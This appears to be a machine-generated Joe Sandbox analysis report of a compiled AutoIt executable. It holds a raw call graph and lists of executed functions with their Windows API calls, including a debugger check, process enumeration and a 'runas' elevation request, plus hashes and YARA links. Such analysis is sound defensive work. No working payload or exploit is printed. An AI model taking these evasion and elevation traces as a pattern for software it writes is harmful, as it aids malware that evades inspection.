86446->86362 86447 472390 86447->86362 86448 47245f 86448->86362 86450 472306 86450->86362 86451 4723d5 86451->86362 86452 4721b6 86452->86362 86453->86362 86454->86364 86455->86366 86456->86409 86457->86452 86458->86430 86459->86396 86460->86411 86461->86435 86462->86450 86463->86405 86464->86428 86465->86445 86466->86407 86467->86431 86468->86447 86469->86412 86470->86436 86471->86451 86472->86406 86473->86429 86474->86446 86475->86410 86476->86433 86477->86448 86478->86413 86479->86398 86480->86414 86481->86427 86482->86444 86483 416454 86520 416c70 86483->86520 86485 416460 GetStartupInfoW 86486 416474 86485->86486 86521 419d5a HeapCreate 86486->86521 86488 4164cd 86489 4164d8 86488->86489 86605 41642b 46 API calls 3 library calls 86488->86605 86522 417c20 GetModuleHandleW 86489->86522 86492 4164de 86493 4164e9 __RTC_Initialize 86492->86493 86606 41642b 46 API calls 3 library calls 86492->86606 86541 41aaa1 GetStartupInfoW 86493->86541 86497 416503 GetCommandLineW 86554 41f584 GetEnvironmentStringsW 86497->86554 86500 416513 86560 41f4d6 GetModuleFileNameW 86500->86560 86503 41651d 86504 416528 86503->86504 86608 411924 46 API calls 3 library calls 86503->86608 86564 41f2a4 86504->86564 86507 41652e 86508 416539 86507->86508 86609 411924 46 API calls 3 library calls 86507->86609 86578 411703 86508->86578 86511 416541 86513 41654c __wwincmdln 86511->86513 86610 411924 46 API calls 3 library calls 86511->86610 86582 40d6b0 86513->86582 86520->86485 86521->86488 86523 417c34 86522->86523 86524 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86522->86524 86613 4178ff 49 API calls _free 86523->86613 86526 417c87 TlsAlloc 86524->86526 86529 417cd5 TlsSetValue 86526->86529 86530 417d96 86526->86530 86527 417c39 86527->86492 86529->86530 86531 417ce6 __init_pointers 86529->86531 86530->86492 86614 418151 InitializeCriticalSectionAndSpinCount 86531->86614 86533 417d2a 86534 417d91 86533->86534 86615 416b49 86533->86615 86622 4178ff 49 API calls _free 86534->86622 86538 417d76 86621 41793c 46 API calls 4 library calls 86538->86621 86540 417d7e GetCurrentThreadId 86540->86530 86542 416b49 __calloc_crt 46 API calls 86541->86542 86543 41aabf 86542->86543 86543->86543 86544 41ac34 86543->86544 86546 416b49 __calloc_crt 46 API calls 86543->86546 86548 4164f7 86543->86548 86550 41abb4 86543->86550 86545 41ac6a GetStdHandle 86544->86545 86547 41acce SetHandleCount 86544->86547 86549 41ac7c GetFileType 86544->86549 86553 41aca2 InitializeCriticalSectionAndSpinCount 86544->86553 86545->86544 86546->86543 86547->86548 86548->86497 86607 411924 46 API calls 3 library calls 86548->86607 86549->86544 86550->86544 86551 41abe0 GetFileType 86550->86551 86552 41abeb InitializeCriticalSectionAndSpinCount 86550->86552 86551->86550 86551->86552 86552->86548 86552->86550 86553->86544 86553->86548 86555 41f595 86554->86555 86556 41f599 86554->86556 86555->86500 86557 416b04 __malloc_crt 46 API calls 86556->86557 86558 41f5bb _memmove 86557->86558 86559 41f5c2 FreeEnvironmentStringsW 86558->86559 86559->86500 86561 41f50b _wparse_cmdline 86560->86561 86562 416b04 __malloc_crt 46 API calls 86561->86562 86563 41f54e _wparse_cmdline 86561->86563 86562->86563 86563->86503 86565 41f2bc _wcslen 86564->86565 86569 41f2b4 86564->86569 86566 416b49 __calloc_crt 46 API calls 86565->86566 86571 41f2e0 _wcslen 86566->86571 86567 41f336 86568 413748 _free 46 API calls 86567->86568 86568->86569 86569->86507 86570 416b49 __calloc_crt 46 API calls 86570->86571 86571->86567 86571->86569 86571->86570 86572 41f35c 86571->86572 86575 41f373 86571->86575 86632 41ef12 46 API calls 2 library calls 86571->86632 86573 413748 _free 46 API calls 86572->86573 86573->86569 86633 417ed3 86575->86633 86577 41f37f 86577->86507 86579 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86578->86579 86581 411750 __IsNonwritableInCurrentImage 86579->86581 86651 41130a 51 API calls __cinit 86579->86651 86581->86511 86583 42e2f3 86582->86583 86584 40d6cc 86582->86584 86585 408f40 VariantClear 86584->86585 86586 40d707 86585->86586 86652 40ebb0 86586->86652 86589 40d737 86655 411951 86589->86655 86594 40d751 86667 40f4e0 SystemParametersInfoW SystemParametersInfoW 86594->86667 86596 40d75f 86668 40d590 GetCurrentDirectoryW 86596->86668 86605->86489 86606->86493 86613->86527 86614->86533 86617 416b52 86615->86617 86618 416b8f 86617->86618 86619 416b70 Sleep 86617->86619 86623 41f677 86617->86623 86618->86534 86618->86538 86620 416b85 86619->86620 86620->86617 86620->86618 86621->86540 86622->86530 86624 41f683 86623->86624 86630 41f69e _malloc 86623->86630 86625 41f68f 86624->86625 86624->86630 86631 417f77 46 API calls __getptd_noexit 86625->86631 86627 41f6b1 HeapAlloc 86629 41f6d8 86627->86629 86627->86630 86628 41f694 86628->86617 86629->86617 86630->86627 86630->86629 86631->86628 86632->86571 86636 417daa 86633->86636 86637 417dc9 setSBCS __call_reportfault 86636->86637 86638 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86637->86638 86641 417eb5 __call_reportfault 86638->86641 86640 417ed1 GetCurrentProcess TerminateProcess 86640->86577 86642 41a208 86641->86642 86643 41a210 86642->86643 86644 41a212 IsDebuggerPresent 86642->86644 86643->86640 86650 41fe19 86644->86650 86647 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86648 421ff0 __call_reportfault 86647->86648 86649 421ff8 GetCurrentProcess TerminateProcess 86647->86649 86648->86649 86649->86640 86650->86647 86651->86581 86708 40ebd0 86652->86708 86656 4182cb __lock 46 API calls 86655->86656 86657 41195e 86656->86657 86712 4181f2 LeaveCriticalSection 86657->86712 86659 40d748 86660 4119b0 86659->86660 86661 4119d6 86660->86661 86662 4119bc 86660->86662 86661->86594 86662->86661 86713 417f77 46 API calls __getptd_noexit 86662->86713 86664 4119c6 86714 417f25 10 API calls strtoxl 86664->86714 86666 4119d1 86666->86594 86667->86596 86715 401f20 86668->86715 86707 40ec00 LoadLibraryA GetProcAddress 86707->86589 86709 40d72e 86708->86709 86710 40ebd6 LoadLibraryA 86708->86710 86709->86589 86709->86707 86710->86709 86711 40ebe7 GetProcAddress 86710->86711 86711->86709 86712->86659 86713->86664 86714->86666 86826 40e6e0 86715->86826 86719 401f41 GetModuleFileNameW 86844 410100 86719->86844 86827 40bc70 52 API calls 86826->86827 86828 401f31 86827->86828 86829 402560 86828->86829 86830 40256d __write_nolock 86829->86830 86831 402160 52 API calls 86830->86831 86833 402593 86831->86833 86832 401c90 52 API calls 86832->86833 86833->86832 86843 4025bd 86833->86843 86834 4026f0 52 API calls 86834->86843 86835 4026a7 86836 401b10 52 API calls 86835->86836 86842 4026db 86835->86842 86838 4026d1 86836->86838 86837 401b10 52 API calls 86837->86843 86870 40d7c0 52 API calls 2 library calls 86838->86870 86840 401c90 52 API calls 86840->86843 86842->86719 86843->86834 86843->86835 86843->86837 86843->86840 86869 40d7c0 52 API calls 2 library calls 86843->86869 86869->86843 86870->86842 87025 472c3f GetUserNameW 87026 40b2b9 87029 40ccd0 87026->87029 87028 40b2c4 87069 40cc70 87029->87069 87031 40ccf3 87032 42c3bb 87031->87032 87034 40cd1b 87031->87034 87042 40cd8a ctype 87031->87042 87089 45e737 90 API calls 3 library calls 87032->87089 87038 40cd30 87034->87038 87057 40cdad 87034->87057 87035 40cd72 87037 402780 52 API calls 87035->87037 87036 402780 52 API calls 87036->87038 87039 40cd80 87037->87039 87038->87035 87038->87036 87038->87042 87078 40e7d0 465 API calls 87039->87078 87040 40ce40 87079 40ceb0 53 API calls 87040->87079 87042->87028 87044 40ce53 87045 408f40 VariantClear 87044->87045 87046 40ce5b 87045->87046 87049 408f40 VariantClear 87046->87049 87047 42c3a0 87087 45e737 90 API calls 3 library calls 87047->87087 87048 42c31a 87080 45e737 90 API calls 3 library calls 87048->87080 87052 40ce63 87049->87052 87052->87028 87053 42c3ad 87088 452670 VariantClear 87053->87088 87054 40cc70 465 API calls 87054->87057 87055 42c327 87081 452670 VariantClear 87055->87081 87057->87040 87057->87047 87057->87048 87057->87054 87059 42c335 87057->87059 87061 42c370 87057->87061 87064 42c343 87057->87064 87082 452670 VariantClear 87059->87082 87085 45e737 90 API calls 3 library calls 87061->87085 87063 42c392 87086 452670 VariantClear 87063->87086 87083 45e737 90 API calls 3 library calls 87064->87083 87067 42c362 87084 452670 VariantClear 87067->87084 87070 40a780 465 API calls 87069->87070 87071 40cc96 87070->87071 87072 42bd0e 87071->87072 87073 40cc9e 87071->87073 87074 408f40 VariantClear 87072->87074 87076 408f40 VariantClear 87073->87076 87075 42bd16 87074->87075 87075->87031 87077 40ccb8 87076->87077 87077->87031 87078->87042 87079->87044 87080->87055 87081->87042 87082->87042 87083->87067 87084->87042 87085->87063 87086->87042 87087->87053 87088->87042 87089->87042 87090 425b5e 87095 40c7f0 87090->87095 87094 425b6d 87130 40db10 52 API calls 87095->87130 87097 40c82a 87131 410ab0 6 API calls 87097->87131 87099 40c86d 87100 40bc70 52 API calls 87099->87100 87101 40c877 87100->87101 87102 40bc70 52 API calls 87101->87102 87103 40c881 87102->87103 87104 40bc70 52 API calls 87103->87104 87105 40c88b 87104->87105 87106 40bc70 52 API calls 87105->87106 87107 40c8d1 87106->87107 87108 40bc70 52 API calls 87107->87108 87109 40c991 87108->87109 87132 40d2c0 52 API calls 87109->87132 87111 40c99b 87133 40d0d0 53 API calls 87111->87133 87113 40c9c1 87114 40bc70 52 API calls 87113->87114 87115 40c9cb 87114->87115 87134 40e310 53 API calls 87115->87134 87117 40ca28 87118 408f40 VariantClear 87117->87118 87119 40ca30 87118->87119 87120 408f40 VariantClear 87119->87120 87121 40ca38 GetStdHandle 87120->87121 87122 429630 87121->87122 87123 40ca87 87121->87123 87122->87123 87124 429639 87122->87124 87129 41130a 51 API calls __cinit 87123->87129 87135 4432c0 57 API calls 87124->87135 87126 429641 87136 44b6ab CreateThread 87126->87136 87128 42964f CloseHandle 87128->87123 87129->87094 87130->87097 87131->87099 87132->87111 87133->87113 87134->87117 87135->87126 87136->87128 87137 44b5cb 58 API calls 87136->87137

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004096C1
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 0040970C
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00409D96
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 0040A6C4
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 004297E5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2383988440-0
                                                                                                                                                                                                                                                            • Opcode ID: f352d12363942d86dc1bbd43c02191cd57d5fabd026ab4665ef0edff56f9f3c7
                                                                                                                                                                                                                                                            • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f352d12363942d86dc1bbd43c02191cd57d5fabd026ab4665ef0edff56f9f3c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                                                                                                                                                                                            Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                                                                                                                                                              • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LKxcbzlwkz.exe,00000104,?), ref: 00401F4C
                                                                                                                                                                                                                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                                                                                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                                                                                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                                                                                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                                                                                                                              • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\LKxcbzlwkz.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                                                                                                                                                              • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                                                                                                                                                              • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                                                                                                                              • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                                                                                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                                                                                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                                                                                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                                                                                                                              • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                                                                                                                              • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                                                                                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                                                                                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                                                                                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                                                                                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                                                                                                                              • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\LKxcbzlwkz.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                                                                                                            • API String ID: 2495805114-1817776820
                                                                                                                                                                                                                                                            • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                                                                                                                                                                            • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                                                                                                                                                                                            Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 2423 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 2432 40e582-40e583 2423->2432 2433 427674-427679 2423->2433 2436 40e585-40e596 2432->2436 2437 40e5ba-40e5cb call 40ef60 2432->2437 2434 427683-427686 2433->2434 2435 42767b-427681 2433->2435 2439 427693-427696 2434->2439 2440 427688-427691 2434->2440 2438 4276b4-4276be 2435->2438 2441 427625-427629 2436->2441 2442 40e59c-40e59f 2436->2442 2450 40e5ec-40e60c 2437->2450 2451 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2437->2451 2452 4276c6-4276ca GetSystemInfo 2438->2452 2439->2438 2448 427698-4276a8 2439->2448 2440->2438 2444 427636-427640 2441->2444 2445 42762b-427631 2441->2445 2446 40e5a5-40e5ae 2442->2446 2447 427654-427657 2442->2447 2444->2437 2445->2437 2454 40e5b4 2446->2454 2455 427645-42764f 2446->2455 2447->2437 2453 42765d-42766f 2447->2453 2456 4276b0 2448->2456 2457 4276aa-4276ae 2448->2457 2459 40e612-40e623 call 40efd0 2450->2459 2460 4276d5-4276df GetSystemInfo 2450->2460 2451->2450 2466 40e5e8 2451->2466 2452->2460 2453->2437 2454->2437 2455->2437 2456->2438 2457->2438 2459->2452 2465 40e629-40e63f call 40ef90 GetNativeSystemInfo 2459->2465 2469 40e641-40e642 FreeLibrary 2465->2469 2470 40e644-40e651 2465->2470 2466->2450 2469->2470 2471 40e653-40e654 FreeLibrary 2470->2471 2472 40e656-40e65d 2470->2472 2471->2472
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 0040E632
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: 0SH
                                                                                                                                                                                                                                                            • API String ID: 3363477735-851180471
                                                                                                                                                                                                                                                            • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                                                                                                                            • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                                                                                                                                                                            Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                                                                                                                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00475657
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2547909840-0
                                                                                                                                                                                                                                                            • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                                                                                                            • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                                                                                                                                                            Function 0046CEF3 Relevance: 9.2, APIs: 6, Instructions: 231comCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0046CF63
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0046CF75
                                                                                                                                                                                                                                                            • CreateBindCtx.OLE32(00000000,?), ref: 0046D01F
                                                                                                                                                                                                                                                            • MkParseDisplayName.OLE32(?,?,?,?), ref: 0046D065
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0046D10B
                                                                                                                                                                                                                                                            • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0046D125
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
